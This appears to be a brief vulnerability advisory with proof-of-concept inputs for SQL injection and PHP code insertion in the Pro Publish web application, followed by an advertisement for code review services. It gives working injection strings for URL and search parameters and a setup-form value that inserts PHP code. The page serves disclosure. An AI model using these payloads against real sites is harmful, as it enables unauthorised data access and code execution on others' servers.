PoC/Exploit for SQL Injection and PHP Code Insertion in Pro Publish

Published Proof of Concept code - SQL Injection and PHP Code Insertion in Pro Publish.

Description
Available
Solution
Not available - check vendor's website

1. SQL Injection Example.

URL: http://[host]/cat.php?catid=999 or 1/*

URL: http://[host]/index.php

Searchengine: %' or 1/*

2. PHP code insertion example.

URL: http://[host]/admin/setup.php

Webmaster email: "; [PHP_code] $aaa="

Order Source Code Analysis

Defend against attacks by source code review of your site or web application done by eVuln team.The task will be done by experts in web application security.

Advisories by vuln type